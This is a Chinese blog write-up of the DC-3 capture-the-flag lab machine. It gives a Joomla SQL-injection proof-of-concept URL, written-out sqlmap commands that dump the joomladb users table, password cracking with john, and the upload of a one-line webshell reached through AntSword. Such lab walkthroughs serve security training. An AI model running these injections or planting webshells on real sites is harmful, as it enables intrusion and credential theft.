DC-3靶机

IP扫描
image.png
端口扫描
image.png
访问80端口
image.png
dirsreach目录探测
dirsearch -u http://192.168.237.157
发现后台登录页面
image.png
后台登录页面
image.png
发现后台cms框架,百度一下joomla框架有什么漏洞
文章地址
https://www.cnblogs.com/arrest/articles/17660026.html
发现有sql注入漏洞,直接把他的poc拿过来用
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))
sqlmap
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" --dbs
获取数据库
image.png
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb --tables
获取表名
image.png
image.png
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb -T “#__users” --columns
获取列名
image.png
image.png
image.png

发现用户名和密码,利用kali自带的john工具解密
先将密码保存到txt文件中
image.png
john工具
image.png
登录
image.png
image.png
image.png
bezz

image.png
发现文件上传功能点
image.png
image.png
新建文件
image.png
写入一句话木马
image.png
image.png
蚁剑进行连接
image.png
image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值